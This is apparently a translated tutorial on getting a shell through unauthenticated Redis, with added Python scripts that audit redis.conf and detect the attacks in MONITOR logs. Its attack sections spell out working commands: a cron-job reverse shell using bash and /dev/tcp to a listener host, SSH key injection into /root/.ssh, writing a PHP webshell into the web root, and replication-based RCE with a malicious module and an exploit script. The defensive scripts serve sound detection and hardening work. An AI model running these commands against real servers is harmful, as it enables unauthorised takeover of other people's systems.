Redis GetShell methods
1. Environment setup
Download: wget http://download.redis.io/releases/redis-4.0.9.tar.gz
Extract: tar -zxvf redis-4.0.9.tar.gz
Then run the following in order:
cd redis-4.0.9
make
make test
make install
Configure redis.conf:
Comment out bind 127.0.0.1
Disable protected mode: change protected-mode yes to protected-mode no
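The two edits above (removing the bind restriction and switching protected-mode off) are exactly the settings a defender should check for. The following audit script is an added example, not code from the original post: it parses a redis.conf with shlex and reports the weak settings next to a hardened counterpart. The two sample configs are constructed for illustration; the directive names (bind, protected-mode, requirepass, rename-command) are real redis.conf directives.

```python
"""Audit a redis.conf for the settings that expose an instance to unauthenticated clients.

Added example (not part of the original post). The parser and both sample
configs below are constructed for illustration.
"""
import shlex

# Constructed sample: the weakened configuration produced by the setup steps above.
WEAK_CONF = """
# bind 127.0.0.1
protected-mode no
port 6379
"""

# Constructed sample: a hardened counterpart (password value is a placeholder).
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
"""

# Commands whose availability to an unauthenticated client is what every
# technique in this post relies on (CONFIG SET dir/dbfilename, SLAVEOF, MODULE LOAD).
DANGEROUS_COMMANDS = ("CONFIG", "SLAVEOF", "REPLICAOF", "MODULE")


def parse_redis_conf(text):
    """Return {directive: [args, ...]} keeping every occurrence; '#' comments are dropped."""
    conf = {}
    for raw in text.splitlines():
        parts = shlex.split(raw, comments=True)
        if not parts:
            continue
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit(conf):
    """Return a list of human-readable findings; an empty list means no weakness found."""
    findings = []

    bound = [addr for args in conf.get("bind", []) for addr in args]
    if not bound:
        findings.append("no bind directive: Redis listens on every interface")
    elif any(addr in ("0.0.0.0", "::", "*") for addr in bound):
        findings.append("bind includes a wildcard address")

    protected = conf.get("protected-mode", [["yes"]])[-1]
    if protected and protected[0].lower() == "no":
        findings.append("protected-mode no: remote clients accepted without authentication")

    if "requirepass" not in conf:
        findings.append("no requirepass: any client may run CONFIG SET / SAVE")

    # rename-command <CMD> "" disables the command entirely.
    disabled = {args[0].upper() for args in conf.get("rename-command", [])
                if len(args) >= 2 and args[1] == ""}
    for cmd in DANGEROUS_COMMANDS:
        if cmd not in disabled:
            findings.append(f"{cmd} command not disabled via rename-command")
    return findings


def audit_text(text):
    """Convenience wrapper: audit a redis.conf given as a string."""
    return audit(parse_redis_conf(text))


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {name} ==")
        for finding in audit_text(text) or ["no findings"]:
            print(" -", finding)
```

Run it against a live instance's redis.conf with `audit_text(open("/etc/redis/redis.conf").read())`. Disabling CONFIG via rename-command is the single change that breaks sections three to five of this post, because every one of them depends on CONFIG SET dir and CONFIG SET dbfilename.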
2. Unauthenticated connection
redis-cli -h <IP address> -p 6379
Test command: info
3. Getting a shell via a cron job
Listen on the local machine: nc -lvvp 4444
Run in Redis:
set x "\n * bash -i >& /dev/tcp/192.168.239.136/8888 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
4. SSH-Keygen
Generate a key pair locally:
cd .ssh
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h 192.168.239.129 -x set crackit
On the Redis side:
redis-cli -h 192.168.239.129
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
save
Finally, run on the local machine:
ssh -i id_rsa root@x.x.x.x
5. Writing a webshell
redis-cli -h 192.168.239.129
config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php phpinfo();?>"
save
6. RCE via master-slave replication
.so file: git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand (after downloading, enter the directory and run make to obtain the malicious .so file)
Python script: git clone https://github.com/Ridter/redis-rce.git
Run: python3 redis-rce.py -r 192.168.239.129 -p 6379 -L 192.168.239.136 -f module.so
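Sections three to six all leave the same footprint on the server: CONFIG SET dir pointing at a cron, .ssh or web root directory followed by SAVE, or a SLAVEOF / MODULE LOAD from a client that should never issue them. The detector below is an added example (not code from the original post or from the linked tools) that runs over redis-cli MONITOR output and raises an alert for each of those sequences, tracking dir and dbfilename per client so that the SAVE alert names the file that was actually written. The MONITOR lines are constructed for illustration in the real `<timestamp> [<db> <addr>] "CMD" "arg"...` layout, and the list of sensitive directories is an assumption to be extended for the environment.

```python
"""Detect RDB-write-to-sensitive-path, SLAVEOF and MODULE LOAD sequences in Redis MONITOR output.

Added example (not part of the original post). Sample lines and the
sensitive-directory list are constructed for illustration.
"""
import re
from collections import defaultdict

# Assumed list of directories where an RDB dump means code or credential injection.
SENSITIVE_DIR_PREFIXES = ("/var/spool/cron", "/etc/cron", "/root/.ssh", "/var/www")
HOME_SSH_RE = re.compile(r"^/home/[^/]+/\.ssh/?$")

# Constructed sample MONITOR output reproducing the sequences in sections 3 and 6.
SAMPLE_MONITOR = """\
1700000000.100 [0 192.168.239.136:50001] "info"
1700000001.100 [0 192.168.239.136:50001] "set" "x" "\\n * bash -i ...\\n"
1700000002.100 [0 192.168.239.136:50001] "config" "set" "dir" "/var/spool/cron/"
1700000003.100 [0 192.168.239.136:50001] "config" "set" "dbfilename" "root"
1700000004.100 [0 192.168.239.136:50001] "save"
1700000010.100 [0 10.0.0.5:40000] "get" "session:42"
1700000011.100 [0 192.168.239.136:50002] "slaveof" "192.168.239.136" "6379"
1700000012.100 [0 192.168.239.136:50002] "module" "load" "./module.so"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')   # quoted args, honouring backslash escapes


def parse_monitor_line(line):
    """Return {'ts', 'client', 'args'} for one MONITOR line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = ARG_RE.findall(m.group("rest"))
    if not args:
        return None
    return {"ts": m.group("ts"), "client": m.group("client"), "args": args}


def is_sensitive_dir(path):
    """True when the path is, or lies under, a directory from the sensitive list."""
    p = path.rstrip("/")
    return any(p == pre or p.startswith(pre + "/") for pre in SENSITIVE_DIR_PREFIXES) \
        or bool(HOME_SSH_RE.match(path))


def detect(lines):
    """Return a list of (timestamp, client, message) alerts for the given MONITOR lines."""
    alerts = []
    state = defaultdict(dict)   # per client: last CONFIG SET dir / dbfilename values
    for line in lines:
        ev = parse_monitor_line(line)
        if not ev:
            continue
        cmd = [a.lower() for a in ev["args"]]
        client = ev["client"]
        if cmd[:2] == ["config", "set"] and len(cmd) >= 4:
            key, value = cmd[2], ev["args"][3]
            state[client][key] = value
            if key == "dir" and is_sensitive_dir(value):
                alerts.append((ev["ts"], client, f"CONFIG SET dir -> {value}"))
        elif cmd[0] in ("save", "bgsave"):
            d = state[client].get("dir", "")
            if is_sensitive_dir(d):
                target = d.rstrip("/") + "/" + state[client].get("dbfilename", "dump.rdb")
                alerts.append((ev["ts"], client, f"RDB dump written to {target}"))
        elif cmd[0] in ("slaveof", "replicaof") and cmd[1:3] != ["no", "one"]:
            master = " ".join(ev["args"][1:3])
            alerts.append((ev["ts"], client, f"replication master changed to {master}"))
        elif cmd[:2] == ["module", "load"]:
            path = ev["args"][2] if len(ev["args"]) > 2 else ""
            alerts.append((ev["ts"], client, f"MODULE LOAD {path}"))
    return alerts


if __name__ == "__main__":
    for ts, client, msg in detect(SAMPLE_MONITOR.splitlines()):
        print(f"{ts} {client}: {msg}")
```

Feed it live data with `redis-cli MONITOR | python3 detect.py` after replacing the sample with `sys.stdin`; MONITOR costs throughput, so on busy instances prefer the same logic over an ACL LOG or proxy log, and treat any SAVE alert as an incident rather than a warning, since by the time it fires the file already exists.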